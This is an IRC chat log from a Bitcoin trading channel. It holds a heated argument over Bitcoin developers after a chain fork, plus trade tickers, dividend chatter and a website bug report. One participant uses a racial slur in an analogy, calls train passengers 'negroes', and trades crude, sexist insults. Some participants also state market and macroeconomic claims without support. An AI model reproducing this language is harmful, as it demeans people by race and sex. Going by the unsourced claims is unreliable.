[-] Mar 14 00:56:01 [HAVELOCK] [SDICE] 4 @ 0.5500001 = 2.2 BTC [-] Mar 14 00:56:36 mircea_popescu: Have you ever considered the possibility that, if you want to actually convince people, being less ascerbic is vastly more effective than more? Mar 14 00:56:55 have you ever reviewed my record ? Mar 14 00:57:17 i wouldn't bet much on the future of anyone that thinks they can stand up to my acerbic. but hey, your money, your vote. Mar 14 00:57:56 This is a people issue I bring up, not a by-rights issue. Are you actually interested in persuasion, or just in ranting angrily because.. why? Mar 14 00:58:04 i am not interested in persuasion. Mar 14 00:58:13 i am interested in splitting any group into two, the sensible and the worthless Mar 14 00:58:17 and then crushing the worthless. Mar 14 00:58:20 Then what is your purpose? Division? Mar 14 00:58:37 if people have enough sense, they'll persuade themselves. Mar 14 00:58:43 wtf captcha! Mar 14 00:58:56 i just filled out a captcha, got it wrong Mar 14 00:59:06 the next one says "almost sucker" Mar 14 00:59:08 you are clearly not human Mar 14 00:59:14 smickles it's why i never do that, fucking hell i get them wrong half the time Mar 14 00:59:22 Reasonable humans will be turned off why your acidity. Are you seriously interested in attracting angry raging psychopaths? Mar 14 00:59:39 Much of what you're saying is precisely what the microcash guy was saying. Mar 14 00:59:45 midnightmagic i am interested in attracking ACTUAL reasonable people, as opposed to the self proclaimed variety. Mar 14 00:59:57 and since there is a distinct lack of reasonable humans involved in bitcon dev... Mar 14 01:00:19 dub there's plenty of self proclaimed reasonable people there Mar 14 01:00:23 midnightmagic can you name some of the angry raging psychopaths that were attracted to mp? Mar 14 01:00:25 who sat on an unconfigured db setup for 4 years Mar 14 01:00:29 very fucking reasonable. Mar 14 01:00:39 jurov lukejr! Mar 14 01:00:45 jurov: I have seen this happen before with RealSolid. Mar 14 01:01:03 nowait! Mar 14 01:01:09 i mean eskimoblob! ciuciu! etc! Mar 14 01:01:39 midnightmagic you should at some point consider that the similarities you perceive are more a function of dirt on your lens than actual object of observation. Mar 14 01:01:40 lol my question was understood the other and third way around Mar 14 01:01:58 similarities are by definition subject to this suspicion. Mar 14 01:04:56 So build the alternative already. Hire the cryptographers, coders, project managers, QA staff, and release engineering departments you think are so cheap and visionless on their own. If you think this alternative will win, build it and let it win. Mar 14 01:05:14 why exactly do you feel the need to advise ? Mar 14 01:05:27 Why exactly do you feel the need to divide? Mar 14 01:05:31 "you people fucked up" "please stop telling us we fucked up because : Mar 14 01:05:33 1. it is not nice Mar 14 01:05:40 2. you shouldn't be telling us this Mar 14 01:05:44 3. you should be doing somerthing else Mar 14 01:05:48 4. yo momma Mar 14 01:05:49 etc Mar 14 01:06:16 you call this reasonable ? dude, srsly. just becasuse your friends tell you you're pretty doesn't make you easier on the eyes than the average shaved donkey butt Mar 14 01:06:45 project managers Mar 14 01:06:47 Since when did I call the bitcoin devs reasonable? Mar 14 01:06:47 burn with fire Mar 14 01:07:06 so what's your argument ? Mar 14 01:07:12 I said, "reasonable humans will be turned off..." Mar 14 01:07:27 Obviously the devs themselves aren't going to bother participating in your alternative. Mar 14 01:07:27 who, specifically ? Mar 14 01:07:49 Whoever it is you think will make your attempt at dividing bitcoin successful. Mar 14 01:07:57 Presumably *not* insane psychopaths. Mar 14 01:08:17 you are telling me about the minute characteristics of a set you can't let alone define other than by reference to me, but even nominally identify in no matter how small a part ? Mar 14 01:08:27 wouldn't this be by definition something i'd know better than you then ? Mar 14 01:08:53 You are the one who claimed you are interested in dividing bitcoin, and on one side "ACTUAL reasonable people". You are the one who defined it. Mar 14 01:08:56 and i am not dividing bitcoin, for that matter. Mar 14 01:09:03 no, i made no such claim. Mar 14 01:09:12 Again, the difference here is that I am actually trying to communicate, and you are trying to be contradictory. Mar 14 01:09:18 bitcoin is NOT the group of idiots that identify with it Mar 14 01:09:19 15:59 < mircea_popescu> midnightmagic i am interested in attracking ACTUAL reasonable people, as opposed to the self proclaimed variety. Mar 14 01:09:22 and bitcoin is not divisible. Mar 14 01:09:23 ^^ What's that then? Mar 14 01:09:51 what i am doing is i am dividing the group of bitcoin supporters, by taking away bitcoin. Mar 14 01:10:06 .. from the current developers, presumably? Mar 14 01:10:11 the reasonable will follow. the "they think are reasonable" will continue in the sort of fanboish obscurity they enjoy. Mar 14 01:10:24 bitcoin has no developers atm, for that matter. Mar 14 01:10:29 just some kids drowning in code. Mar 14 01:10:56 they're kids because their window to man up and "we fucked up, yes" has by now closed. Mar 14 01:11:06 they're drowning in code for quite obvious reasons i won't rehash. Mar 14 01:11:10 And users who "support" them. Including the biggest exchange, most of the smaller exchanges, the major developers, the cryptographers who review the work done, the pools who secure the blockchain, and the hardware builders springing up to do so who have already made strong ties with the *current* development team. Mar 14 01:11:21 the "biggest exchange" is written in php, Mar 14 01:11:28 had 500 second lag during a light trade day Mar 14 01:11:34 and just gave its us market away to a patent scam. Mar 14 01:11:42 tyvm. the approximate sum value of your list is epslion. Mar 14 01:11:52 So is Facebook, isn't it? Mar 14 01:11:57 exactly. Mar 14 01:12:02 you're welcome to stick with facebook. Mar 14 01:12:05 i'll go with bitcoin. Mar 14 01:12:30 I'm saying, "PHP is bad" is just another form of "no true scotsman" Mar 14 01:12:33 and if you think the pools are currently securing anything you're pretty much in the raging psychopath group yourself. Mar 14 01:12:41 what has the successful attack recently demonstrated ? Mar 14 01:13:10 that btc is headless Mar 14 01:13:17 Lots of things. I can't possibly imagine which subset of the whole you are referring to. Mar 14 01:13:22 yaya. mkay. Mar 14 01:13:24 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [+] Mar 14 01:13:50 i note you picked the stylistical out of that list. do address the lag and the other point sometime. Mar 14 01:15:21 I'm not going to defend the bitcoin developers. I'm just interested in what motivates your incredible.. determination.. to rant and attack so endlessly. Mar 14 01:15:36 you might want to read polimedia Mar 14 01:15:40 my motivation is to state the truth. Mar 14 01:15:41 you know Mar 14 01:15:43 do some research Mar 14 01:16:45 benkay: How helpful of you. I bow to your mighty helpfulness. Mar 14 01:16:52 trilema needs .edu domain Mar 14 01:17:13 moar like .xxx Mar 14 01:17:21 if you're being sarcastic, I don't parse sarcasm online. Mar 14 01:17:25 eudxxx Mar 14 01:17:27 .edu is for things that don't change anything. Mar 14 01:17:32 eduxxx ftw! Mar 14 01:17:37 benkay: How helpful of you. I bow to your mighty helpfulness. Mar 14 01:17:47 ah Mar 14 01:17:57 someone should make htsp and then have inane specifications Mar 14 01:18:12 mircea_popescu: Look, I'm telling you dude. The more you rant, the more you are going to alienate people who would otherwise be much more interested in supporting your point of view. Mar 14 01:18:25 midnightmagic: have you read polimedia? Mar 14 01:18:31 no dude. you are telling me that some vanitous idiots would like the benefit of claiming we're friends Mar 14 01:18:36 but witout having to put in any work. Mar 14 01:18:44 thing is... i couldn't care less about this. Mar 14 01:18:52 mircea_popescu: You don't have to be friends with someone to engage in civil discourse. Mar 14 01:19:07 i am engaging in very civil discourse,. Mar 14 01:19:21 the problem is that some people ran off with their c++ hairball implementation of what they call civil discourse Mar 14 01:19:28 i never got the spec and i never started caring. Mar 14 01:19:52 mircea_popescu: And I know of no examples of people who are interested in the Badge: "I tell everybody I'm mircea's friend and reap benefits thereby." Mar 14 01:20:45 mircea_popescu: I would say, good on you for ignoring those people. Mar 14 01:22:03 midnightmagic read bitcoin-dev sometime. it's chockfull. Mar 14 01:22:08 It is for those exact reasons why the need is great for heterogency in client implementations. Thus, I say you should do it. Create an alternative implementation and go for it. Mar 14 01:22:19 i am not creating any implementation Mar 14 01:22:27 jesus fucking christ! dude! SPECIFICATION FIRST Mar 14 01:22:33 what the hell is wrong with everybody Mar 14 01:22:49 Then do it. Do the work that the devs can't or won't, and build the spec. Mar 14 01:22:59 That's part of what a devteam does. Mar 14 01:23:02 more's the point, can you read c++ ? Mar 14 01:23:08 Can I? Mar 14 01:23:12 i am asking. Mar 14 01:23:18 Yes. Mar 14 01:23:27 do you want to summarize bitcoin code ? Mar 14 01:24:00 As you are so fond of saying, hire the braindead monkeys who can do it *for* you for the peanuts you say they're worth, and have them do it. Mar 14 01:24:19 so i'm takingthat as a sort of up and down and all about no. Mar 14 01:24:44 I am not interested in working on that project, if you are offering me a job. Mar 14 01:24:59 so then what are we talkin' about. Mar 14 01:25:09 you just bored at work or something ? Mar 14 01:25:21 Are you? Mar 14 01:26:03 sigh. mkay. Mar 14 01:28:24 I know you have trouble when people talk back to you and all, but geez man. At a certain point, don't let the concorde fallacy trap you into pursuing a dead end. Mar 14 01:29:02 midnightmagic you think writing spec from code is work for mokyes? Mar 14 01:29:13 monkeys? Mar 14 01:29:26 [MPEX] [O.BTCUSD.P370T] 100 @ 0.03402633 = 3.4026 BTC [-] Mar 14 01:29:26 jurov: I'm not. He says so all the time. Perhaps you should take benkay's advice. Mar 14 01:29:39 midnightmagic you revealed your gaping incompetence in this area then Mar 14 01:29:50 midnightmagic i have trouble when people talk back ?! Mar 14 01:30:10 seriously midnightmagic, i think you're abstracting your past history of interaction with who knows who and painting it on me. Mar 14 01:30:16 jurov: Still the rhetorical master I see. Mar 14 01:30:16 as far as i know we've never met. Mar 14 01:30:42 midnightmagic, I still lack concrete examples. Names. Mar 14 01:31:00 Either the "reaging idiots" who supposedly are attracted to mp Mar 14 01:31:00 mircea_popescu: I have no idea what you're getting at. Mar 14 01:31:08 i am getting at this : Mar 14 01:31:14 Or the "reasonable people" that would be supportng him "if..." Mar 14 01:31:32 if you spend your childhood living among white people, abnd being told niggers are to be identified by x y z and they do k l m things, Mar 14 01:31:45 jurov: Your English still needs work. My verb tense in context was indicative of that-which-happens-from-here-on. Mar 14 01:31:47 you are bound to misbehave wehn confronted with actual black people. Mar 14 01:32:34 jurov: I dunno actual names. It's irrelevant to the point. Mar 14 01:32:34 O_o Mar 14 01:32:40 just so, it'd seem to me, you've been told how to identify independent thought, and what great evil it is, and now when you discover it in the actual world you immediately jump to the conclusion tis evil. Mar 14 01:32:53 midnightmagic: O.o? Mar 14 01:32:53 midnightmagic, so there was not the case in the past? what is the problem then? Mar 14 01:32:53 tis not evil. Mar 14 01:33:36 Luke-Jr: hello. I hope all my statements including you were correctly inferenced as rhetorical device and not assertions of fact. Mar 14 01:33:55 lmao Mar 14 01:34:18 mircea_popescu: I am not afraid to be civil. Why are you? Mar 14 01:34:24 lol. Mar 14 01:34:46 you know, girl wants to get married. after tears have washed pointlessly about the room, her new line becomes "why are you affraid of commitment" Mar 14 01:34:56 i'm not affraid of commitment bitch. i just don't care for your definition of it. Mar 14 01:35:41 mircea_popescu: I assert you are, have been, and will likely continue to be uncivil and discourteous. Mar 14 01:35:44 being civil is not a formal concern. it does NOT mean not calling people idiots. if indeed they are idiots then that's that, verity proof. Mar 14 01:35:50 beingcivil is a fundamental concern. Mar 14 01:36:09 people who lie by presenting the mining corruption as "consensus", they are being uncivil. Mar 14 01:36:23 and on a related point, you don't go to heaven by never saying "jesus sucks" etiher. Mar 14 01:36:26 what do you mean by "mining corruption"? Mar 14 01:36:31 That is an English definitional nuance which you are assuming, but which is not reality. Mar 14 01:36:37 benkay do you know how the most recent fork was resolved ? Mar 14 01:36:52 sort of; devs said "use 0.7" and everyone did Mar 14 01:36:54 midnightmagic that dispute as to reality will have to come to my grave. Mar 14 01:36:59 benkay what more do you need ? Mar 14 01:37:06 Aumann's agreement theorem I guess. Mar 14 01:37:14 stalin said "everyone vote" and evertyone did. what democratic process is this ? Mar 14 01:37:22 heh Mar 14 01:37:24 well ? Mar 14 01:37:29 how many times do you think they can pull it off? Mar 14 01:37:30 but ok, i can understand it happening. Mar 14 01:37:30 1? Mar 14 01:37:32 infinity? Mar 14 01:37:37 i CANT uinderstand it being passed for what it's not Mar 14 01:37:46 in an ultimately doomed effort to prop the dirt as respectable. Mar 14 01:37:51 that's just politics though Mar 14 01:38:05 Gah.. dude.. your weird sayings aren't translating so well. Mar 14 01:38:07 well that's unfortunate for them because i happen to be better at politics than they're at coding. Mar 14 01:38:32 benkay anyway the effort is to make sure it's 1. Mar 14 01:38:53 i say < 3 Mar 14 01:39:03 no Mar 14 01:39:06 less than or equal to Mar 14 01:39:13 or better yet 5 Mar 14 01:39:14 19 Mar 14 01:39:15 42. Mar 14 01:39:17 definitely. Mar 14 01:39:25 not saying should Mar 14 01:39:29 but offering a wager Mar 14 01:39:29 i get it. Mar 14 01:39:41 midnightmagic: I didn't understand the context :P Mar 14 01:40:39 Luke-Jr: I was just asserting that the amount of work you do in bitcoind essentially makes you a bitcoin developer, even if your name isn't on bitcoin.org. Mar 14 01:40:42 hey guys did you get your ASICMINER div as well? Mar 14 01:40:45 Luke-Jr: don't sweat, me too, he sounds serious but in the end it's all just hypothetical Mar 14 01:41:19 Luke-Jr he's somehow bothered with everyone mocking you for trying your damnest to pass yourself off as a dev Mar 14 01:41:25 when you're a sort of glorified taaki Mar 14 01:41:30 ie, the floor washer. Mar 14 01:41:31 Luke-Jr: I also proffered the possibility you didn't want your name up there on purpose, to outline our collective ignorance. Mar 14 01:41:36 midnightmagic: I got that, but .. why did it matter? XD Mar 14 01:42:30 Luke-Jr: I dunno why he started ranting about you. But he gets upset when I don't address each of his points individually. Mar 14 01:42:38 midnightmagic: I don't see it as something worth my time arguing a case for. Mar 14 01:42:55 has anything in this conversation? Mar 14 01:43:02 in other news https://forums.butterflylabs.com/blogs/sensemaster/91-blog-entry-deleting-o-o.html Mar 14 01:43:07 err Mar 14 01:43:08 wrong link XD Mar 14 01:43:13 https://forums.butterflylabs.com/blogs/luke-jr/97-preparing-my-trip-bfl.html Mar 14 01:43:37 glwt. Mar 14 01:43:44 ahhh Luke, going there to pick it up? Mar 14 01:44:05 excited? Mar 14 01:44:10 BitHub: not sure if I'll pick it up or let them ship it Mar 14 01:44:28 although I guess they might be expecting me to take it with me Mar 14 01:45:50 actually just the time to get a box of fans. Mar 14 01:46:28 are you kind of going there to confirm it all? Mar 14 01:47:11 heh Mar 14 01:47:13 so you'll pretty much be teh first person with a bfl? Mar 14 01:47:56 this will be so epic Mar 14 01:49:16 BitHub: yes re: AM div btw (sorry for the on-topic interlude people) Mar 14 01:49:37 nice dubs Mar 14 01:49:47 this weeks seemed the highest yet Mar 14 01:50:02 yeah, enjoy, next week is the last Mar 14 01:50:08 what? Mar 14 01:50:11 of this magnitude Mar 14 01:50:13 ya wut ? Mar 14 01:50:18 WHAT? Mar 14 01:50:21 serial? Mar 14 01:50:28 BitHub: I'm mainly going there to make sure BFGMiner is ready to go (shipping on the MiniRigs) Mar 14 01:50:57 nice Mar 14 01:51:41 catfriedrice said next weeks will fullfil the 'pay out 0.1 first' requirement, which seems about right, so next divs will be half less more expenses Mar 14 01:51:57 ahh ghey Mar 14 01:52:07 good time to sell then Mar 14 01:52:57 !ticker btct asicminer-pt Mar 14 01:53:00 [BTCT:ASICMINER-PT] 1D: 0.695 / 0.70412 / 0.724998 (285 shares, 200.7 BTC), 7D: 0.65 / 0.71126 / 1 (1286 shares, 914.7 BTC), 30D: 0.65 / 0.6947 / 1 (1763 shares, 1224.8 BTC) Mar 14 01:53:16 such a blown stock. Mar 14 01:53:19 i know that and i'm not even holding any Mar 14 01:53:36 hmmm Mar 14 01:56:00 [MPEX] [O.BTCUSD.P370T] 1000 @ 0.03383499 = 33.835 BTC [-] Mar 14 01:56:26 in other news, loud black humans in snack car Mar 14 01:56:33 ruin my train trip why doncha Mar 14 01:56:39 PLUS COUNTRY Mar 14 01:56:40 sheesh. Mar 14 01:56:46 i like country. Mar 14 01:57:59 which? Mar 14 01:59:41 i dunno, cash Mar 14 02:00:08 duelling banjos Mar 14 02:00:14 [BTCTC] [ASICMINER-PT] 2 @ 0.72 = 1.44 BTC [+] Mar 14 02:00:34 willie nelson? Mar 14 02:00:38 turkey in the straw if you count it Mar 14 02:01:02 i dunno that i've listened to much of that guy. Mar 14 02:01:19 hello Mar 14 02:01:22 he blazes alot Mar 14 02:01:31 sevenWiabores hi Mar 14 02:01:33 ^^ very important information Mar 14 02:01:36 ;) Mar 14 02:01:38 haha Mar 14 02:01:54 who are you mircea_popescu, your nick sounds very familiar Mar 14 02:02:01 [BTCTC] [ASICMINER-PT] 5 @ 0.721337 = 3.6067 BTC [+] Mar 14 02:02:02 i am mircea popescu. how about you ? Mar 14 02:02:21 (to finish that story, the best part was the really uptight black guy staring at the loud negroes) Mar 14 02:02:28 [MPEX] [O.BTCUSD.P390T] 500 @ 0.0453858 = 22.6929 BTC [-] Mar 14 02:02:37 [BTCTC] [ASICMINER-PT] 1 @ 0.724869 BTC [+] Mar 14 02:02:39 (i just told them i could block out high dB convserations or music but not both) Mar 14 02:02:49 ok willie nelson kinda sucks,. Mar 14 02:02:54 continuing the wtfality of bitcoin asset universe Mar 14 02:03:11 or at least his cover of blue eyes cryin' Mar 14 02:03:33 doom projected for AM profits in varios places == increased demand Mar 14 02:03:37 benkay lol why so passive-agressive Mar 14 02:03:43 I am just nobody, but I am pretty sure I saw your name somewhere... I am new to the bitcoin world and I am not familiar with the who's who Mar 14 02:03:45 [BTCTC] [ASICMINER-PT] 3 @ 0.724869 = 2.1746 BTC [+] Mar 14 02:03:47 dub this is becominga tradition. Mar 14 02:03:54 hardly passive aggressive for the pacnw Mar 14 02:04:02 gonna organize am shorting Mar 14 02:04:18 in fact i didn't list anything new on bitfunder for some time Mar 14 02:04:18 sevenWiabores i run mpex. Mar 14 02:04:19 spent much time in this corner of the us, mircea_popescu? Mar 14 02:04:33 alternatively, some people don't like me. they run things into the ground. Mar 14 02:04:40 jurov: can you convince Ukto to make it render in firefox? Mar 14 02:04:40 benkay which corner is that ? Mar 14 02:04:46 aah, I see. ohai :) Mar 14 02:04:46 northwest Mar 14 02:04:47 jurov: buttfunder that is Mar 14 02:04:56 sure, i lived like a year in lowell, mass Mar 14 02:04:58 dub, you mean misplaced buy/sell boxes? Mar 14 02:04:59 make what render? Mar 14 02:05:10 make the market link visible Mar 14 02:05:13 mircea are you from romania or US your english is american? Mar 14 02:05:14 o nm, you said west. Mar 14 02:05:23 where is it not visible? Mar 14 02:05:25 [MPEX] [S.DICE] 152 @ 0.00599987 = 0.912 BTC [+] Mar 14 02:05:25 LameCoin- im from romania, but i've lived all over. Mar 14 02:05:27 [MPEX] [S.DICE] 80 @ 0.00599987 = 0.48 BTC [+] Mar 14 02:05:27 on the front page Mar 14 02:05:37 mircea where did you like it best Mar 14 02:05:43 costa rica, probably. Mar 14 02:05:44 a friend of mine is from timisoara Mar 14 02:05:49 land of eternal spring. Mar 14 02:05:58 dub: hm. you dont see it in the top left? Mar 14 02:06:01 it does get boring, but very slowly. Mar 14 02:06:05 Ukto: sometimes I do Mar 14 02:06:07 'View asset market' Mar 14 02:06:13 sometimes? Mar 14 02:06:16 what browser? Mar 14 02:06:19 Ukto: depends on teh machine/browser im on Mar 14 02:06:19 dub this is like the most halpful bug reporting ever Mar 14 02:06:21 [BTCTC] [ASICMINER-PT] 30 @ 0.72489 = 21.7467 BTC [+] Mar 14 02:06:24 ff is the failing one Mar 14 02:06:36 well its been reported before Mar 14 02:06:43 how do you know lol Mar 14 02:06:45 what version? I hadnt seen it lol Mar 14 02:06:49 mircea_popescu: why did you choose to live in romania? Mar 14 02:06:55 17.0.1 works fine Mar 14 02:06:57 for the women Mar 14 02:07:10 back in 2007 it became obvious the us is sinking. didn't want to be on that part of the world. had to go somewhere. Mar 14 02:07:14 Ukto if you resize the width to around 1000-1100px Mar 14 02:07:23 timisoara is nice its different then the rest of romania Mar 14 02:07:24 the view asset bar hides Mar 14 02:07:24 ahhhh Mar 14 02:07:29 i see that Mar 14 02:07:32 19 here, pretty sure it was broke in some previous, goat was having problems a few days ago too Mar 14 02:07:34 LameCoin- it's closer to vienna than bucharest indeed. Mar 14 02:07:40 yeah, i will get it fixed. Mar 14 02:07:41 thanks guys Mar 14 02:08:16 [BTCTC] [ASICMINER-PT] 2 @ 0.72489 = 1.4498 BTC [+] Mar 14 02:08:22 oh, i see why Mar 14 02:08:28 the top bar spans 2 lines and covers it Mar 14 02:08:30 BDB bug ? Mar 14 02:08:30 mircea: do you think that fork could have been the end of bitcoin? Mar 14 02:08:56 LameCoin- that fork itself could have festered if anyone ddosed the attacking pool. Mar 14 02:09:12 but not really. the burried problems that caused the fork however most definitely will end btcoin if unadressed. Mar 14 02:10:11 i really dont like these alternates like litecoin inflating the money supply Mar 14 02:10:25 you will have to learn to live with competition. Mar 14 02:10:34 it's as unavoidable as rain. Mar 14 02:11:07 i'm not even convinced we've converged on a codebase Mar 14 02:11:26 certainly are not. Mar 14 02:11:46 just the butthurt when somebody finally says, wait, you think you people matter ?! Mar 14 02:11:55 is ample proof this wasn't even seriously considered, let alone settled. Mar 14 02:12:29 the development team became to obsessed thinking they are economists and philosophers Mar 14 02:12:45 nerds should never be given any type of authority Mar 14 02:12:52 when they're barely qualified to write code. but anyway : Mar 14 02:12:58 hm, i think I will just move terms and conditions to the footer Mar 14 02:13:01 preparing for the "too big to fail" arguments, it'll be a warm summer. Mar 14 02:13:06 its wasting too much space Mar 14 02:13:16 mircea what do you mean? Mar 14 02:13:16 some of these guys aren't qualified? Mar 14 02:13:36 kind of like getting the airport janitor to fly the plane no? Mar 14 02:13:50 oh be nice Mar 14 02:13:52 LameCoin- i mean that's what's coming next, "guise our shit has taken too much blood sweat and tears to be abandoned and we should forever wallow in it" Mar 14 02:13:54 turbine blade engineer Mar 14 02:14:11 still should not fly plane. Mar 14 02:14:18 are you suggesting they wont repair the problems? Mar 14 02:14:31 that's what midnightmagic means by concorde fallacy : the mistaken idea that the current codebase is useful because it cost people a lot of money through all the bugs it pushed on them so far. Mar 14 02:14:46 why cant someone else develop it? Mar 14 02:14:48 LameCoin- they would if they could. so far their consensus seems to be they're not smart enough to do it. Mar 14 02:14:54 http://www.quickmeme.com/meme/3td1ly/ Mar 14 02:15:06 True story ^. Mar 14 02:15:15 lol Mar 14 02:15:24 i learned about it when it was 15. bought like 1k worth Mar 14 02:15:24 maybe everyone should pitch in a lil btc to pay teh pros Mar 14 02:15:28 then it was 2 for a while. Mar 14 02:15:30 I told my friend about it Mar 14 02:15:37 bowjob: nobody ever buys bottoms Mar 14 02:15:44 now he's like.. can I buy $300 worth? Mar 14 02:15:57 bowjob: less then 0.1% of bitcoiners actually held coins from $2 to $50 Mar 14 02:16:01 I'm like.. no. I can sell you $100 Mar 14 02:16:06 well Mar 14 02:16:13 It is applicable to that idea, were it true, yes. Mar 14 02:16:15 it would be nice if you missed all the crashing Mar 14 02:16:16 LameCoin- got a figure ? Mar 14 02:16:28 This was when BTC started from 13 to 50 rally Mar 14 02:16:37 it was 17 when i mentioned it Mar 14 02:16:40 mircea it works the same for any bull market, 1983-2000 dow jones 75% of the public didnt even participate one bit Mar 14 02:16:42 midnightmagic do you have the figure for "how much unencrypted wallet.dat" cost ? Mar 14 02:16:56 everyone got in 1999 Mar 14 02:17:06 dub: there, problem fixed Mar 14 02:17:14 LameCoin- this is true. i'm just saying, i think a lot more people held btc than .1% Mar 14 02:17:23 from $2-50 ? Mar 14 02:17:24 mircea_popescu: Do you have the figure for how much the encrypted wallet.dat has cost? Mar 14 02:17:27 LameCoin- yes. Mar 14 02:17:43 Ukto: <3 Mar 14 02:17:43 i doubt it go read on bitcoin talk how many sold out after 20-30% gains hoping to buy back in Mar 14 02:17:48 midnightmagic sadly power-ranger team has not the time to do any auditing or reporting, so no. Mar 14 02:17:50 the 10-20 move everyone sold Mar 14 02:17:50 Theres this dude who forgot he had a wallet.dat with lots of coins Mar 14 02:17:59 Bowjob you mean bitcoinica ? Mar 14 02:18:07 I was tired of seeing that link up there anyways. Mar 14 02:18:08 Ukto, did you test it in chrome? Mar 14 02:18:11 nah, it was a single person Mar 14 02:18:17 he gave away 350 BTC to reddit users Mar 14 02:18:19 LameCoin- do you mean .1% by headcount or by coincount ? Mar 14 02:18:22 i got 5 btc from that stash Mar 14 02:18:27 jurov: just did Mar 14 02:18:28 mircea_popescu: Always the insults. And how does derogatory statements that are purely derogatory fit under the "telling the truth" umbrella you were espousing earlier? Mar 14 02:18:29 i assume he had thosands Mar 14 02:18:34 in konqueror+webkit it still does hide Mar 14 02:18:45 is the terms still at the top ? Mar 14 02:18:49 midnightmagic point of fact is, the only way we know how much implementing it cost is by devteam saying "we spent 5 hours doing this" Mar 14 02:18:51 but that's fringe browser, never mind Mar 14 02:19:03 no term si on bottom Mar 14 02:19:10 but it acts the same? 0,o Mar 14 02:19:16 i will try to check it a bit later Mar 14 02:19:18 mircea: from my studies of markets, it is very very rare that anyone participates in a huge move Mar 14 02:19:24 have to get konqueror Mar 14 02:19:32 mircea_popescu: Were you referring to how many bitcoins were lost due to a wallet being easily stolen by a hacker? Mar 14 02:19:34 LameCoin- markets in general or bitcoin ? Mar 14 02:19:43 midnightmagic yes. Mar 14 02:19:53 either way, thanks for letting me know guys. mucho appreciato. :) Mar 14 02:19:59 lol appreciato Mar 14 02:19:59 mircea: considering herding applies to all markets, even bitcoin just go read how many missed the boat on the latest rally over on the forums its astonishing Mar 14 02:20:06 donde esta la zapatoria! Mar 14 02:20:08 Ukto, just get webkit anything, like chromium. konqueror pulls half of kde in. Mar 14 02:20:30 LameCoin- it's a weak supposition this, linear generalisation from fiat to bitcoin markets. we're still working at getting the hang of this Mar 14 02:20:40 how many in here rode bitcoin from $2 to 50 Mar 14 02:20:44 there's a lot of paradoxical movement (dub was referring one of the more documented types recentyl) Mar 14 02:20:46 or even 10 to 50 Mar 14 02:20:54 i held over 10k from 2 to 50. Mar 14 02:20:58 significantly over 10k. Mar 14 02:21:03 mircea_popescu: So tell me after all these months of vitriol.. how successful have you been at dividing bitcoin into "actual reasonable people" and "worthless" people? Mar 14 02:21:04 i know for a fact i'm not the only one. Mar 14 02:21:14 midnightmagic months ?! Mar 14 02:21:18 fork was yesterday dawg. Mar 14 02:21:35 mircea if you take a poll of channel you will find it to be a small % Mar 14 02:21:39 You've been hating on the devs for far longer than that. Mar 14 02:21:44 have not. quote. Mar 14 02:22:03 Uh. Okay. Mar 14 02:22:14 midnightmagic: well he has a point, the devs have turned into economists and politicians, they are suppose to be coders Mar 14 02:22:30 midnightmagic: nerds love to give themselves excessive credit when they percieve something going their way Mar 14 02:22:43 LameCoin- i know at least a coupla people here who held, so it'd be above 1% for sure :) Mar 14 02:23:10 LameCoin-: I have no idea how you'd even show that without your hypothesis instantly falling to contradiction. Mar 14 02:23:14 midnightmagic you still got any coins minted a year or two ago ? Mar 14 02:24:09 mircea: what type of market cap are you realstically expecting for bitcoin Mar 14 02:24:15 mircea_popescu: Continue as though I do. Mar 14 02:24:29 ;;calc 2 / 119 Mar 14 02:24:30 0.0168067226891 Mar 14 02:24:34 there lamecoin, 1.6% Mar 14 02:24:42 1.7.. Mar 14 02:24:55 im generous, give him his .1% :p Mar 14 02:25:09 LameCoin- re the mkt cap : Mar 14 02:25:22 ;;google flexibility inflexibility trilema Mar 14 02:25:23 Voluntary contracts, after a while. pe Trilema - Un blog de Mircea ...: ; "bernanke put" and the fed's trilemma - Pragmatic Capitalism: ; External factors and Philippine monetary policy - Bank for ...: Mar 14 02:25:29 the bah Mar 14 02:25:54 http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/ Mar 14 02:26:04 i'd better start remembering at least the motherfucking titles. Mar 14 02:26:55 14k per coin is enough to support a 50 trillion dollar global economy assuming everyone uses nothing but bitcoin Mar 14 02:27:39 so we can assume thousands per coin are not really realistic Mar 14 02:27:47 ... Mar 14 02:28:05 LameCoin-: remember we can divide the coins further Mar 14 02:28:20 the current world has a base money supply of about 4 trillion Mar 14 02:28:45 LameCoin- notional derivative trade is literally boundless. Mar 14 02:28:53 thats not money Mar 14 02:28:55 dub, that could end up akin to "oh we can add some bits to internet address later" Mar 14 02:28:58 if it settles in bitcoin it doesn't even matter if the world uses zimbabwe dollars. Mar 14 02:29:08 jurov it definitely will, Mar 14 02:29:21 but that's a minor point comparing to the other hairs sticking out of the code Mar 14 02:29:26 jurov: it'd require a fork yea Mar 14 02:30:46 one would hope it isnt going to require as many forlifts as your example Mar 14 02:30:49 the balance of macroeconomic power will never shift from the west in our lifetime Mar 14 02:30:59 LameCoin- it's shifted already, forget it. Mar 14 02:31:16 "the west" is a bit player. Mar 14 02:31:16 mircea: how so? can you name any innovations/products you actually use from the east? Mar 14 02:31:28 products are not the point. you were discussing macroeconomy. Mar 14 02:31:34 forklifts* Mar 14 02:31:41 rice Mar 14 02:31:42 the east has nothing to offer to be honest Mar 14 02:31:46 to you. Mar 14 02:31:59 the problem seems to be you're mingling a lot of assumptions crafted for comfort into your estimations. Mar 14 02:32:08 china with 1.6billion people has *0* worldwide brands Mar 14 02:32:23 the only ones they have were purchased from the west ie lenovo Mar 14 02:32:26 LameCoin- because by "worldwide" you count a pool of 2-300mn people nobody cares abnout. Mar 14 02:32:35 who needs brands when ya making money Mar 14 02:32:40 fact is, the us has zero worldwide brands in the sense that china has baidu and doesn't care about google. Mar 14 02:32:43 bithub but they arent making money Mar 14 02:32:52 most asian companies have aweful ROI Mar 14 02:32:52 o boy. Mar 14 02:33:03 is that why they own most of usa's debt? Mar 14 02:33:04 dude. macroeconomy! balance of trade! Mar 14 02:33:24 bithub: thats because they recycle it through debasement of their own currency Mar 14 02:33:31 0.0 Mar 14 02:33:37 mircea: the balance of trade in the EU is positive. Mar 14 02:33:42 west isn't even using m-wallets or m-commerce yet Mar 14 02:33:45 the stakes just got too high for my blood in this convo. Mar 14 02:33:58 the US balance of trade is mostly energy Mar 14 02:34:31 asians are running modern day versions of mercantalism Mar 14 02:34:51 they think the way to prosperity is subsidizing exports in order to accumulate intrinsically worthless dollars Mar 14 02:35:10 don't hate Mar 14 02:35:16 read what happend to the british when they believed in mercantalism Mar 14 02:35:25 we're making money over ere Mar 14 02:35:45 once again, most asians firms have absolutely aweful ROI's Mar 14 02:35:46 asia baby Mar 14 